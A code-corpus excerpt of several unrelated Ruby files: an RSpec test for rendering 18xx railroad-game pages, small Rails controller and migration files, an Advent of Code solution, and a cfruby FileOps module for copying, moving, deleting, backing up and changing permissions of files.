1 10 11 12 13 14 2 20 3 30 4 40 5 6 60 7 8 80 9 A AR Anan Awaji B C D
D100 D80 E ER F G H I IR Ikeda Imabari J K KO Komatsujima Kotohira
Kouchi Kouen KU Kubokawa L Marugame Matsuyama Muki Muroto Nahari
Nakamura Nangoku Naruto Niihama Ohzu Okayama Ritsurin SR Saijou
Sakaide Sukumo T TR Takamatsu Tokushima UR Uwajima Yawatahama
],
'18Chesapeake' => %w[
1 10 100 11 12 13 14 2 3 30 4 40 5 50 6 60 7 8 80 9 A Allentown Amboy
B B&O B&S Baltimore Berlin Burlington C C&A C&O
C&OC C-P Camden Charleroi Charlottesville Coal Columbia
Connellsville D D&R DC Delmarva E Easton F Fredericksburg G Green
H Hagerstown Harrisburg I J K L LV Leesburg Lynchburg N&W New
Norfolk OO Ohio PLE PRR Peninsula Philadelphia Pittsburgh Princeton
Richmond SRR Spring Strasburg Trenton Virginia Washington West
Wilmington York
],
}.each do |game_title, expected_strings|
context game_title do
it 'renders map' do
rendered = render(app_route: "/map/#{game_title}")
aggregate_failures 'expected strings' do
expected_strings.each { |s| expect(rendered).to include(s) }
end
end
end
end
end
it 'renders new_game' do
expect(render(app_route: '/new_game')).to include('Create New Game')
end
it 'renders game' do
needs = {
game_data: {
id: 1,
user: { id: 1, name: 'Player 1' },
players: [{ id: 1, name: 'Player 1' }, { id: 2, name: 'Player 2' }],
title: '1889',
actions: [],
loaded: true,
},
user: {
id: 1,
name: 'Player 1',
settings: { consent: true },
},
}
expect(render(app_route: '/game/1', **needs)).to include('Takamatsu E-Railroad')
expect(render(app_route: '/game/1#entities', **needs)).to include('Entities', 'Player 1', 'Awa Railroad')
expect(render(app_route: '/game/1#map', **needs)).to include('Kotohira')
expect(render(app_route: '/game/1#market', **needs)).to include('The Bank', 'Cash', 'Par value')
expect(render(app_route: '/game/1#info', **needs)).to include('Upcoming')
expect(render(app_route: '/game/1#tiles', **needs)).to include('492')
expect(render(app_route: '/game/1#spreadsheet', **needs)).to include('Value')
expect(render(app_route: '/game/1#tools', **needs)).to include('Clone this')
end
TEST_CASES = [
['1889',
314,
[[6, 'stock_round', 'Pass (Share)'],
[13, 'float', 'KO receives ¥700'],
[21, 'lay_track', '1889: Operating Round 1.1 (of 1) - Lay Track'],
[22, 'buy_train',
['KO must buy an available train',
'!!johnhawkhaines must contribute']],
[46, 'run_routes', '1889: Operating Round 2.1 (of 1) - Run Routes'],
[47, 'dividends', '1889: Operating Round 2.1 (of 1) - Pay or Withhold Dividends'],
[78,
'buy_company',
['1889: Operating Round 3.1 (of 1) - Buy Companies',
'Owning corporation may ignore building cost for mountain hexes']],
[81,
'track_and_buy_company',
['1889: Operating Round 3.1 (of 1) - Lay Track',
'Show companies from other players']],
[87,
'special_track',
['1889: Operating Round 3.1 (of 1) - Lay Track for Ehime Railway',
'Blocks C4 while owned by a player.']],
[336, 'discard_train', 'Discard Trains'],
[346, 'buy_train_emr', 'TR must buy an available train'],
[445,
'buy_train_emr_shares',
['KO has ¥582',
'johnhawkhaines must contribute ¥518 for KO to afford a train from the Depot',
'johnhawkhaines has ¥74 in cash',
'johnhawkhaines has ¥650 in sellable shares',
'johnhawkhaines must sell shares to raise at least ¥444',
'!!Bankruptcy']],
[nil, 'endgame', '1889: Operating Round 7.1 (of 3) - Game Over - Bankruptcy']]],
['1882',
5236,
[[399, 'sc_home_token', '1882: Stock Round 6 - Place Home Token'],
[229, 'qll_home_token', '1882: Operating Round 4.1 (of 1) - Place Home Token'],
[370, 'nwr_place_token', '1882: Operating Round 5.2 (of 2) - NWR: Place Token'],
[371, 'nwr_lay_track', '1882: Operating Round 5.2 (of 2) - NWR: Lay Track']]],
['1846',
3099,
[[0, 'draft', '1846: Draft Round 1 - Draft Companies'],
[18, 'draft', 'Mail Contract'],
[49,
'lay_track_or_token',
['1846: Operating Round 1.1 (of 2) - Place a Token or Lay Track',
# Minor charter stuff
'Michigan Southern', 'Trains', '2', 'Cash', 'C15', '$60']],
[74,
'issue_shares',
['1846: Operating Round 1.1 (of 2) - Place a Token or Lay Track',
'Issue', '1 ($50)', '2 ($100)', '3 ($150)', '4 ($200)']],
[94,
'dividend',
['Pay or Withhold Dividends',
'2 right',
'1 right',
'1 left']],
[142,
'assign',
['1846: Operating Round 2.1 (of 2) - Assign Steamboat Company',
'Blondie may assign Steamboat Company to a new hex and/or corporation or minor.',
'Add $20 per port symbol to all routes run to the assigned location '\
'by the owning/assigned corporation/minor.']],
[nil, 'endgame', '1846: Operating Round 6.2 (of 2) - Game Over - Bank Broken']]],
['1846', 'hs_cvjhogoy_1599504419', [[49, 'buy_train_emr_shares', 'has $60 in sellable shares']]],
['1846', 'hs_sudambau_1600037415', [[37, 'buy_train', ['GT has $280', '!!can issue shares']]]],
['1846',
'hs_sudambau_1600037415',
[[41,
'buy_train_issuing',
['B&O has $120',
'B&O can issue shares to raise up to $40',
'Emergency Issue',
'!!Bankruptcy']]]],
['1846',
'hs_sudambau_1600037415',
[[50,
'buy_train_president_cash',
['B&O has $146',
'Player 3 must contribute $14 for B&O to afford a train from the Depot.',
'Player 3 has $15',
'Player 3 has $0 in sellable shares',
'!!Bankruptcy']]]],
['1846',
'hs_sudambau_1600037415',
[[60,
'buy_train_bankrupt',
['B&O has $0',
'Player 3 must contribute $160 for B&O to afford a train from the Depot.',
'Player 3 has $15',
'Player 3 has $0 in sellable shares',
'Player 3 must sell shares to raise at least $145.',
'Player 3 does not have enough liquidity to contribute towards B&O buying a '\
'train from the Depot. B&O must buy a train from another corporation, or Player 3 '\
'must declare bankruptcy.',
'Declare Bankruptcy']]]],
['18AL',
4714,
[[nil, 'endgame', '18AL: Operating Round 7.2 (of 3) - Game Over - Company hit max stock value']]],
['18GA',
9222,
[[nil, 'endgame', '18GA: Operating Round 9.1 (of 3) - Game Over - Bank Broken']]],
['18TN',
7818,
[[nil, 'endgame', '18TN: Operating Round 8.2 (of 3) - Game Over - Bank Broken']]],
['18MS',
14_375,
[[nil, 'endgame', '18MS: Operating Round 10 (of 10) - Game end after OR 10 - Game Over']]],
['18MEX',
13_315,
[[278,
'merge',
['Merge',
'Decline',
'Corporations that can merge with NdM']]]],
['18MEX',
17_849,
[[nil, 'endgame', '18MEX: Operating Round 4.2 (of 2) - Game Over - Bankruptcy']]],
['1817',
20_758,
[[369,
'choose_corp_size',
['1817: Stock Round 2 - Buy or Sell Shares',
'Strasburg Railroad',
'Loans', '0/2',
'Number of Shares:', '2', '5']]]],
['1817',
15_528,
[[196,
'merge',
['Convert',
'Merge',
'Grand Trunk Western Railroad',
'Corporations that can merge with A&S']],
[205, 'offer', ['Offer for Sale', 'Warren & Trumbull Railroad']],
[383,
'merge_with_other_players',
['Convert',
'Merge',
'Pittsburgh, Shawmut and Northern Railroad',
'Corporations that can merge with J']]]],
['1817',
16_852,
[[889, 'cash_crisis', ['Player owes the bank $294 and must sell shares if possible.']]]],
['1817',
16_281,
[[812,
'buy_sell_post_conversion',
['Merger Round 4.2 (of 2) - Buy/Sell Shares Post Conversion',
'New York, Susquehanna and Western Railway']]]],
['18Chesapeake',
1905,
[[166, 'blocking_special_track', ['Lay Track for Columbia - Philadelphia Railroad']]]],
['18CO',
20_708,
[[456,
'corporate_share_buy',
['Buy Market Share',
'Buy 20% DSNG Share',
'Buy 10% DSNG Share',
'Buy DPAC Share',
'Buy DSL Share']],
[462,
'corporate_share_sale',
['Denver Pacific Railway',
'Sell 1 ($150)',
'Silverton Narrow Gauge',
'Sell 1 ($120)']],
[nil, 'pass', ['18CO: Operating Round 6.2 (of 2) - Game Over - Bank Broken']]]],
['1867',
21_268,
[[531,
'mid_convert',
['Choose Major Corporation']],
[533,
'buy_shares_post_merge',
['Buy Shares Post Merge',
'Buy Treasury Share']],
[698,
'major_nationalize',
['Nationalize Major',
'Choose if Major is nationalized',
'Grand Trunk Railway']],
[nil,
'endgame',
['Operating Round 6.3 (of 3) - Game Over']]]],
['1860',
'19_354',
[[215,
'stock_round_1',
['!!<div>Fishbourne Ferry Company',
'<div>Cowes Marina and Harbour',
'<div>Brading Harbour Company']],
[350,
'stock_round_2',
['<div>Fishbourne Ferry Company',
'<div>Cowes Marina and Harbour',
'<div>Brading Harbour Company']],
[444,
'stock_round_3',
['<div>Fishbourne Ferry Company',
'!!<div>Cowes Marina and Harbour',
'!!<div>Brading Harbour Company']],
[nil,
'endgame',
['1860: Operating Round 8.4 (Nationalization) - Game Over - Nationalization complete']]]],
].freeze
def render_game_at_action(data, action_count, string)
data['actions'] = data['actions'].take(action_count) if action_count
data[:loaded] = true
needs = {
game_data: data,
user: data['user'].merge(settings: { consent: true }),
}
html = render(app_route: "/game/#{needs[:game_data]['id']}", **needs)
strings = Array(string)
strings.each do |str|
if str =~ /^!!/
expect(html).not_to include(str.slice(2..))
else
expect(html).to include(str)
end
end
end
def render_game(jsonfile, action_count, string)
data = JSON.parse(File.read(jsonfile))
render_game_at_action(data, action_count, string)
end
TEST_CASES.each do |game, game_id, actions|
data = JSON.parse(File.read("spec/fixtures/#{game}/#{game_id}.json"))
actions.each do |action_config|
action, step, string = action_config
describe "#{game} #{game_id}" do
it "renders #{step} #{action}" do
render_game_at_action(data.dup, action, string)
end
end
end
end
it 'renders tutorial to the end' do
render_game('public/assets/tutorial.json', nil, 'Good luck and have fun!')
end
end
end
| 37.192893 | 111 | 0.563873 |
086a5e76a93fe2cd49a4efde8e0ec8f543d40399 | 443 | class String
def underscore
self.gsub(/::/, '/').
gsub(/([A-Z]+)([A-Z][a-z])/,'\1_\2').
gsub(/([a-z\d])([A-Z])/,'\1_\2').
tr("-", "_").
downcase
end
end
r = IO.read("TwitterUser.swift").split("\n").map do |line|
next line unless line.match(/^\s*let /)
# bits = line.split("_")
# [bits[0]] + bits.drop(1).map { |b| b.capitalize }
idx = line.index(":")
line[0...idx].underscore + line[idx..-1]
end.to_a
puts r
| 23.315789 | 58 | 0.523702 |
08ee60517d28bb0b2452e09e954080f76045268a | 308 | class CurrentRoundsController < ApplicationController
respond_to :json
# GET /current_rounds
# GET /current_rounds.json
def index
render json: {
current_round: Round.current_round,
current_round_deadline: Round.deadline,
current_round_status: Round.round_status
}
end
end
| 23.692308 | 53 | 0.74026 |
ff8f39a7892bd064faa50741eac34465ceea38ab | 280 | class AddDetailsToUser < ActiveRecord::Migration[5.2]
def change
add_column :users, :first_name, :string
add_column :users, :last_name, :string
add_column :users, :location, :string
add_column :users, :phone, :string
add_column :users, :bio, :text
end
end
| 28 | 53 | 0.703571 |
4a22534fa4c1e06a496e5fdf80abf75c5c121d73 | 555 | class AddIdToRights < ActiveRecord::Migration
def self.up
drop_table "user_projects"
create_table "user_projects", :force => true do |t|
t.integer "project_id", :limit => 11
t.integer "user_id", :limit => 11
t.boolean "project_admin"
end
end
def self.down
drop_table "user_projects"
create_table "user_projects", :id => false, :force => true do |t|
t.integer "project_id", :limit => 11
t.integer "user_id", :limit => 11
t.boolean "project_admin"
end
end
end
| 27.75 | 70 | 0.607207 |
4a7105e40940c12316a4cc7065c0da2800517969 | 391 | #!/usr/bin/env ruby
file_path = File.expand_path("../day-05-input.txt", __FILE__)
input = File.read(file_path)
loop do
prev_length = input.length
input.gsub!(/([A-z])\1+/i) do |match|
chr = match[0]
pattern = chr.downcase + chr.upcase
match
.gsub(pattern, "")
.gsub(pattern.reverse, "")
end
break if input.length == prev_length
end
puts input.length | 18.619048 | 61 | 0.634271 |
b9419887b57cf5cc4ec32753fb0798d10899e92f | 25,898 | # rtags regression test file (originally by David Powers as part of cfruby)
module Cfruby
module FileOps
# Class variable to control the behavior of FileOps.backup globally
@@backup = true
# Base class for all FileOperation specific exceptions
class FileOpsError < Cfruby::CfrubyError
end
# Raised when the requested protocol for a file operation is unknown
class FileOpsUnknownProtocolError < FileOpsError
end
# Raised when a file operation is attempted on a non-existent file
class FileOpsFileExistError < FileOpsError
end
# Raised when a move or copy will overwrite a file and :force => false
class FileOpsOverwriteError < FileOpsError
end
# Raised when a method is called on a file of the wrong type
class FileOpsWrongFiletypeError < FileOpsError
end
# Interface description for FileCommand interface. Should be
# implemented on a case by case basis and included in the get_protocol
# method.
class FileOps::FileCommand
# Moves +filename+ to +newfilename+. Options may be set to
# one or more of the following:
# <tt>:preserve</tt>:: true/false - preserve permissions
# <tt>:noop</tt>:: true/false - don't actually do anything
# <tt>:mode</tt>:: permissions - set the permissions of the copied file (uses chmod)
def move(filename, newfilename, options={})
end
# Copies +filename+ to +newfilename+. Options may be set to
# one or more of the following:
# <tt>:preserve:: true/false - preserve permissions
# <tt>:noop:: true/false - don't actually do anything
# <tt>:mode:: permissions - set the permissions of the copied file (uses chmod)
def copy(filename, newfilename, options={})
end
end
# FileCommand interface for local to local operations
class FileOps::LocalFileCommand
# Options:
# <tt>:force</tt>:: (defaults to true) force the move
# <tt>:mode</tt>:: set the mode of +newfilename+
# <tt>:preserve</tt>:: attempts to preserve the mode and ownership of newfilename if it exists
# <tt>:onlyonchange</tt>:: only copy if the file has changed (implies force)
def move(filename, newfilename, options = {})
if(options[:force] == nil)
options[:force] = true
end
currentstat = nil
Cfruby.controller.attempt("move #{filename} to #{newfilename}", 'destructive') {
if(options[:onlyonchange] and File.exist?(newfilename))
options[:force] = true
originalsum = Cfruby::Checksum::Checksum.get_checksums(filename)
newsum = Cfruby::Checksum::Checksum.get_checksums(newfilename)
if(originalsum.sha1 == newsum.sha1)
Cfruby.controller.attempt_abort("files have the same sha1 hash")
end
end
if(File.exists?(newfilename))
if(options[:preserve])
currentstat = File.stat(newfilename)
end
if(options[:force])
FileOps.delete(newfilename)
else
raise(FileOpsOverwriteError, "\"#{newfilename}\" already exists")
end
end
FileUtils.mv(filename, newfilename)
if(currentstat and options[:preserve])
FileOps.chmod(newfilename, currentstat.mode)
FileOps.chown(newfilename, currentstat.uid, currentstat.gid)
end
if(options[:mode] != nil)
FileOps.chmod(newfilename, options[:mode])
end
}
end
# Executes FileUtils.cp followed by FileOps.chmod and FileOps.chown (using :user, :group, and :mode).
# If filename is a glob it will be expanded and all resultant filenames will be copied with the assumption
# that newfilename is a directory.
# Options:
# <tt>:backup</tt>:: true to make a backup of +newfilename+ before copying
# <tt>:force</tt>:: (defaults to true) force the copy even if newfilename exists
# <tt>:onlyonchange</tt>:: only copy if the file has changed (implies force)
# <tt>:recursive</tt>:: recursively copy
def copy(filename, newfilename, options = {})
# set default options
if(options[:force] == nil)
options[:force] = true
end
if(options[:onlyonchange])
options[:force] = true
end
# first, a basic check that filename exists somehow
if(Dir.glob(filename).length == 0)
raise(FileOpsFileExistError, "\"#{filename}\" does not exist")
end
# get the base directory of the copy
basedir = File.dirname(Pathname.new(Dir.glob(filename)[0]).realpath.to_s)
basedirregex = Regexp.new(Regexp.escape(basedir) + "/?(.*)$")
# use file find to get a list of files to copy
FileFind.find(filename, options) { |filename|
# copy each file after adjusting for the base directories
basename = basedirregex.match(filename)[1]
if(File.directory?(newfilename))
copy_single(filename, newfilename + "/#{basename}", options)
else
copy_single(filename, newfilename, options)
end
}
end
# Executes FileUtils.cp followed by FileOps.chmod and FileOps.chown (using :user, :group, and :mode).
# filename and newfilename must be single files
# Options:
# <tt>:backup</tt>:: true to make a backup of +newfilename+ before copying
# <tt>:force</tt>:: (defaults to true) force the copy even if newfilename exists
# <tt>:onlyonchange</tt>:: only copy if the file has changed (implies force)
def copy_single(filename, newfilename, options = {})
mode = options[:mode]
owner = options[:user]
group = options[:group]
options.delete :mode
options.delete :user
options.delete :group
force = options[:force]
if(force == nil)
force = true
end
Cfruby.controller.attempt("copy #{filename} to #{newfilename}", 'destructive') {
if(!File.exists?(filename))
raise(FileOpsFileExistError, "\"#{filename}\" does not exist")
end
if(!force and File.exists?(newfilename))
raise(FileOpsOverwriteError, "\"#{newfilename}\" already exists")
end
if(options[:onlyonchange] and File.exist?(newfilename))
options[:force] = true
originalsum = Cfruby::Checksum::Checksum.get_checksums(filename)
newsum = Cfruby::Checksum::Checksum.get_checksums(newfilename)
if(originalsum.sha1 == newsum.sha1)
Cfruby.controller.attempt_abort("files have the same sha1 hash")
end
end
if options[:backup]
FileOps.backup(newfilename) if File.exist? newfilename
options.delete :backup
options.delete :onlyonchange
end
if(File.exists?(newfilename) and force)
FileOps.delete(newfilename)
end
if(File.directory?(filename))
FileUtils.mkdir(newfilename)
else
FileUtils.cp(filename, newfilename, :preserve => true)
end
}
# change ownership and mode if we need to
FileOps.chown(newfilename,owner,group,options) if owner or group
FileOps.chmod(newfilename,mode) if mode
end
end
# FileCommand interface for rsync operations
class FileOps::RsyncFileCommand
# Options:
# <tt>:user</tt>:: The user to use on the remote side
# <tt>:archive</tt>:: Equivilant to -a in the rsync command
# <tt>:recursive</tt>:: Recursive
# <tt>:flags</tt>:: Passed directly to the rsync command
def move(filename, newfilename, options = {})
end
# Options:
# <tt>:archive</tt>:: Equivilant to -a in the rsync command
# <tt>:recursive</tt>:: Recursive
# <tt>:flags</tt>:: Passed directly to the rsync command
def copy(filename, newfilename, options = {})
flags = Array.new()
if(options[:flags])
flags << options[:flags]
end
if(options[:archive])
flags << "-a"
end
if(options[:recursive])
flags << "-r"
end
rsynccommand = "rsync #{flags.join(' ')} #{filename} #{newfilename}"
Cfruby.controller.attempt(rsynccommand, 'destructive', 'unknown') {
Cfruby::Exec.exec(rsynccommand)
}
end
end
# FileCommand interface for http operations
class FileOps::HTTPFileCommand
def move(filename, newfilename, options = {})
raise(Exception, "HTTP move not implemented")
end
# Options:
# <tt>:recursive</tt>:: Recursive
# <tt>:flags</tt>:: Passed directly to the rsync command
def copy(filename, targetdir, options = {})
flags = Array.new()
if(options[:flags])
flags << options[:flags]
end
wgetcommand="cd #{targetdir} && "
if(options[:recursive])
wgetcommand=wgetcommand + "wget -q -np -nH -r -l inf --cut-dirs=#{filename.split(/\//).length} #{flags} http://#{filename}"
else
wgetcommand=wgetcommand + "wget -q #{flags} http://#{filename}"
end
Cfruby.controller.attempt(wgetcommand, 'destructive', 'unknown') {
Cfruby::Exec.exec(wgetcommand)
}
end
end
# Returns a FileCommand object based on the first protocol it sees
# in either filename or newfilename
def FileOps.get_protocol(filename, newfilename)
protocolregex = /^([a-zA-Z]+):\/\//
protocol = 'file'
match = protocolregex.match(filename)
if(match == nil)
match = protocolregex.match(newfilename)
end
if(match != nil)
protocol = match[1]
end
case(protocol)
when 'file'
return(LocalFileCommand.new())
when 'rsync'
return(RsyncFileCommand.new())
when 'http'
return(HTTPFileCommand.new())
else
raise(FileOpsUnknownProtocolError, "Unknown protocol - \"#{protocol}\"")
end
end
# Moves +filename+ to +newfilename+. Options may be set to
# one or more of the following:
# <tt>:??????</tt>:: anything defined under the protocol specific copy function
def FileOps.move(filename, newfilename, options = {})
get_protocol(filename, newfilename).move(strip_protocol(filename), strip_protocol(newfilename), options)
end
# Copies +filename+ to +newfilename+. Options may be set to
# one or more of the following:
# <tt>:??????</tt>:: anything defined under the protocol specific copy function
def FileOps.copy(filename, newfilename, options = {})
get_protocol(filename, newfilename).copy(strip_protocol(filename), strip_protocol(newfilename), options)
end
# Create an empty file named +filename+
# Returns true if the file was created, false otherwise
def FileOps.touch(filename)
created = false
Cfruby.controller.attempt("touch #{filename}") {
if File.exist? filename
# if the file already exists do nothing
Cfruby.controller.attempt_abort("#{filename} already exists - won't create")
else
f = File.new(filename,File::CREAT|File::TRUNC|File::RDWR)
f.close
Cfruby.controller.inform('verbose', "created file #{filename}")
created = true
end
}
return(created)
end
# Alias for delete
def FileOps.unlink(filenamelist)
FileOps.delete(filenamelist)
end
# Creates a directory entry. +dirname+ can be an Array or String.
# Options:
# <tt>:mode</tt>:: mode of the directory
# <tt>:user</tt>:: user to own the directory
# <tt>:group</tt>:: group to own the directory
# <tt>:makeparent</tt>:: make any needed parent directories
# Returns true if a directory was created, false otherwise
def FileOps.mkdir(dirname, options = {})
if(dirname.kind_of?(String))
dirname = Array.[](dirname)
end
created = false
dirname.each { |d|
Cfruby.controller.attempt("mkdir #{d}", 'destructive') {
if(!File.directory?(d))
if(options[:makeparent])
FileUtils.mkdir_p(d)
else
FileUtils.mkdir(d)
end
created = true
mode = options[:mode]
user = options[:user] or Process.euid()
group = options[:group] or Process.egid()
FileOps.chown(d,user,group,options)
FileOps.chmod(d,mode) if mode
else
Cfruby.controller.attempt_abort("#{d} already exists")
end
}
}
return(created)
end
# Remove a directory entry. +dirname+ can be an Array or String.
# Returns true if a directory was removed, false otherwise
def FileOps.rmdir(dirname, force = false)
if(dirname.kind_of?(String) or dirname.kind_of?(Pathname))
dirname = Array.[](dirname)
end
deletedsomething = false
dirname.each do | d |
Cfruby.controller.attempt("rmdir #{d}", 'nonreversible', 'destructive') {
if(!test(?e, d))
Cfruby.controller.attempt_abort("#{d} does not exist")
end
if(test(?d, d))
if(force)
FileUtils.rm_rf(d)
deletedsomething = true
else
FileUtils.rmdir(d)
deletedsomething = true
end
else
raise(FileOpsWrongFiletypeError, "\"#{d}\" is not a directory")
end
}
end
return(deletedsomething)
end
# Creates a symbolic link +linkfile+ which points to +filename+.
# If +linkfile+ already exists and it is a directory, creates a symbolic link
# +linkfile/filename+. If +linkfile+ already exists and it is not a
# directory, raises FileOpsOverwriteError. Returns true if a link is made
# false otherwise.
# Options:
# <tt>:force</tt>:: if true, overwrite +linkfile+ even if it already exists
def FileOps.link(filename, linkfile, options={})
createdlink = false
if !File.exist? filename
raise(FileOpsFileExistError, "filename '#{filename}' does not exist")
else
Cfruby.controller.attempt("link '#{linkfile}' -> '#{filename}'", 'destructive') {
# Use a realpath for the filename - a relative path fails below
filename = Pathname.new(filename).realpath
if(File.exists?(linkfile))
if(File.symlink?(linkfile) and Pathname.new(linkfile).realpath == filename)
# if the link already exists do nothing
Cfruby.controller.attempt_abort("#{linkfile} already exists as a symlink")
elsif(options[:force])
unlink(linkfile)
else
raise(FileOpsOverwriteError, "#{linkfile} already exists")
end
end
FileUtils.ln_s(filename, linkfile)
createdlink = true
}
end
return(createdlink)
end
# Creates an empty file +filenames+ if the file does not already exist. +filenames+ may be
# an Array or String. If the file does exist, the mode and ownership may be adjusted. Returns
# true if a file was created, false otherwise.
def FileOps.create(filenames, owner = Process::Sys.geteuid(), group = Process::Sys.getegid(), mode = 0600)
if(filenames.kind_of?(String))
filenames = Array.[](filenames)
end
created = false
filenames.each() { |filename|
Cfruby.controller.attempt("create #{filename}", 'destructive') {
currentumask = File.umask()
begin
if(!test(?f, filename))
# set a umask that disables all access to the file by default
File.umask(0777)
File.open(filename, File::CREAT|File::WRONLY) { |fp|
}
created = true
end
chmod = FileOps.chmod(filename, mode)
chown = FileOps.chown(filename, owner, group)
if(chmod == false and chown == false)
Cfruby.controller.attempt_abort("\"#{filename}\" exists and has the appropriate owner, group, and mode")
else
created = true
end
ensure
# restore the umask
File.umask(currentumask)
end
}
}
return(created)
end
# Lock a file +fn+, using a lockfile, and return a file handle to +fn+.
# +attr+ are standard file open attributes like 'w'. File based locking is
# used to correctly handle mounted NFS and SMB shares.
def FileOps.flock(fn, attr=nil, ext='.cflock')
Cfruby.controller.attempt("lock #{fn}") {
begin
fnlock = fn+ext
if File.exist? fnlock
Cfruby.controller.inform("warn", "File #{fn} is locked by #{fnlock} (remove to fix) - skipping!")
end
Cfruby.controller.inform('debug', "locking #{fnlock}")
fl = File.open fnlock,'w'
fl.print "pid=#{Process.pid}\nCfruby lock file"
fl.close
f = File.open fn, attr
# ---- Update file
yield f
ensure
Cfruby.controller.inform('debug', "unlock #{fnlock}")
File.unlink fnlock if fl
f.close if f
end
}
end
# Sets @@backup
def FileOps.set_backup(newbackup)
@@backup = newbackup
end
# Creates a backup copy of +filename+ with the new filename
# filename_cfruby_yyyymmdd_x, where x increments as more backups
# are added to the same directory. Options:
# <tt>:backupdir</tt>:: directory to hold the backups (defaults to the same directory as +filename+)
# <tt>:onlyonchange</tt>:: prevent backup from making a backup if viable backup already exists.
def FileOps.backup(filename, options={})
if !@@backup
return
end
Cfruby.controller.attempt("backup #{filename}", 'destructive') {
if(!filename.respond_to?(:dirname))
filename = Pathname.new(filename.to_s())
end
# set the backup directory if it wasn't passed in
backupdir = options[:backupdir]
if(backupdir == nil)
backupdir = filename.dirname()
end
# find the latest backup file and test the current file against it
# if :onlyonchange is true
if(options[:onlyonchange])
backupfiles = Dir.glob("#{backupdir}/#{filename.basename()}_[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]_[0-9]*")
if(backupfiles.length > 0)
lastbackup = backupfiles.sort.reverse()[0]
currentchecksums = Cfruby::Checksum::Checksum.get_checksums(filename)
lastbackupchecksums = Cfruby::Checksum::Checksum.get_checksums(lastbackup)
if(currentchecksums.sha1 == lastbackupchecksums.sha1)
Cfruby.controller.attempt_abort("viable backup already exists \"#{lastbackup}\"")
end
end
end
tries = 3
numbermatch = /_[0-9]{8}_([0-9]+)$/
begin
nextnum = -1
# loop through any existing backup files to get the next number
Dir.[]("#{backupdir}/#{filename.basename()}_#{Time.now.strftime('%Y%m%d')}_*") { |backupfile|
match = numbermatch.match(backupfile)
if(match != nil)
if(match[1].to_i() > nextnum)
nextnum = match[1].to_i()
end
end
}
nextnum = nextnum + 1
# attempt to open it
success = false
begin
File.open("#{backupdir}/#{filename.basename()}_#{Time.now.strftime('%Y%m%d')}_#{nextnum}", File::RDONLY)
rescue Exception
FileOps.copy(filename, "#{backupdir}/#{filename.basename()}_#{Time.now.strftime('%Y%m%d')}_#{nextnum}")
success = true
end
if(false == success)
raise(Exception, "Unable to create backup copy of #{filename}")
end
rescue Exception
# we play this game three times just to try to handle possible race
# conditions between the choice of filename and the opening of the file
tries = tries - 1
if(tries < 0)
raise($!)
end
end
}
end
# Deletes files that contain no alphanumeric characters. Returns true if any files were deleted
# false otherwise
def FileOps.delete_nonalpha(basedir, options = {})
deleted = false
Cfruby.controller.attempt("deleting files non-alpha files from \"#{basedir}\"", 'nonreversible', 'destructive') {
if(FileOps.delete_not_matching_regex(basedir, /[a-zA-Z0-9]/))
deleted = true
end
}
return(deleted)
end
# Deletes matching files. Returns true if a file is actually deleted, false otherwise.
# In addition to the normal find options delete also takes:
# <tt>:force</tt>:: => (true|false) delete non-empty matching directories
def FileOps.delete(basedir, options = {})
deletedsomething = false
Cfruby.controller.attempt("deleting files from \"#{basedir}\"", 'nonreversible', 'destructive') {
begin
options[:returnorder] = 'delete'
Cfruby::FileFind.find(basedir, options) { |filename|
if(!filename.symlink?() and filename.directory?())
FileOps.rmdir(filename, options[:force])
else
FileOps::SymlinkHandler.unlink(filename)
end
deletedsomething = true
}
rescue Cfruby::FileFind::FileExistError
Cfruby.controller.attempt_abort("#{basedir} does not exist")
end
}
return(deletedsomething)
end
# Changes the owner, group, and mode all at once. Returns true if a change was made to
# owner, group, or mode - false otherwise. If mode==nil it is ignored.
def FileOps.chown_mod(basedir, owner, group, mode, options = {})
changemade = false
Cfruby.controller.attempt("changing ownership and mode of matching files in \"#{basedir}\"", 'destructive') {
usermanager = Cfruby::OS::OSFactory.new.get_os.get_user_manager()
if(owner and !owner.kind_of?(Integer))
owner = usermanager.get_uid(owner)
end
if(group and !group.kind_of?(Integer))
group = usermanager.get_gid(group)
end
Cfruby::FileFind.find(basedir, options) { |filename|
if(FileOps.chown(filename, owner, group))
changemade = true
end
if(mode!=nil and FileOps.chmod(filename, mode))
changemade = true
end
}
}
return(changemade)
end
# Disables matching files by setting all permissions to 0000. Returns true if anything
# was disabled, false otherwise.
def FileOps.disable(basedir, options = {})
disabled = false
Cfruby.controller.attempt("disabling file in \"#{basedir}\"", 'destructive') {
Cfruby::FileFind.find(basedir, options) { |filename|
if(Cfruby::FileOps.chmod(filename, 0000))
disabled = true
end
}
}
return(disabled)
end
# Chown's matching files. Returns true if a change was made, false otherwise.
def FileOps.chown(basedir, owner, group=nil, options = {})
changemade = false
usermanager = Cfruby::OS::OSFactory.new.get_os.get_user_manager()
if(owner and !owner.kind_of?(Integer))
owner = usermanager.get_uid(owner)
end
if(group and !group.kind_of?(Integer))
group = usermanager.get_gid(group)
end
Cfruby::FileFind.find(basedir, options) { |filename|
Cfruby.controller.attempt("changing ownership of \"#{filename}\" to \"#{owner}:#{group}\"", 'destructive') {
currentuid = File.stat(filename).uid
currentgid = File.stat(filename).gid
filename.chown(owner, group)
if(currentuid == File.stat(filename).uid and currentgid == File.stat(filename).gid)
Cfruby.controller.attempt_abort("unchanged, already owned by \"#{owner}:#{group}\"")
end
changemade = true
}
}
return(changemade)
end
# Chmod's matching files. Returns true if a change was made, false otherwise.
def FileOps.chmod(basedir, permissions, options = {})
changemade = false
Cfruby::FileFind.find(basedir, options) { |filename|
attemptmessage = "changing permissions of \"#{filename}\" to \""
if(permissions.kind_of?(Numeric))
attemptmessage = attemptmessage + sprintf("%o\"", permissions)
else
attemptmessage = attemptmessage + "#{permissions}\""
end
Cfruby.controller.attempt(attemptmessage, 'destructive') {
currentmode = File.stat(filename).mode()
# try it with internal functions, but try to call chmod if we have to
if(permissions.kind_of?(Numeric))
FileUtils.chmod(permissions, filename)
else
output = Cfruby::Exec.exec("chmod '" + permissions.to_s.gsub(/'/, "\\\&") + "' '" + filename.realpath.to_s.gsub(/'/, "\\\&") + "'")
if(output[1].length > 0)
raise(FileOpsError, output.join("\n"))
end
end
if(currentmode == File.stat(filename).mode())
Cfruby.controller.attempt_abort("unchanged, already set to \"#{permissions}\"")
else
changemade = true
end
}
}
return(changemade)
end
# Methods for standard operations involving symbolic links
module FileOps::SymlinkHandler
# Returns File.stat unless it is a symbolic link not pointing
# to an existing file - in that case it returns File.lstat
def SymlinkHandler.stat(filename)
if(!filename.kind_of?(Pathname))
filename = Pathname.new(filename.to_s)
end
if(filename.symlink? and broken?(filename))
return File.lstat(filename)
end
return(File.stat(filename))
end
